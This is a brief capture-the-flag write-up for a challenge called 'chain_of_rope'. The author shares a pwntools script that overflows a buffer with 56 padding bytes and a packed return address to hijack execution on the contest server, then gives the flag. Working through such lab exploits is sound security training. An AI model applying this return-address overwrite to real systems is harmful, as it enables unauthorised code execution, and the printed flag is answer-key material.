Rating: 5.0

My solution could be called lazy as I cheated original idea how to solve it. I think it is self explanatory so I'll paste here my exploit.

```
from pwn import *

#c = process('./chain_of_rope')
c = remote('shell.actf.co',19400)
c.sendlineafter('?','1')
c.sendline('a'*+56+p64(0x401231))
c.interactive()
```

### actf{dark_web_bargains}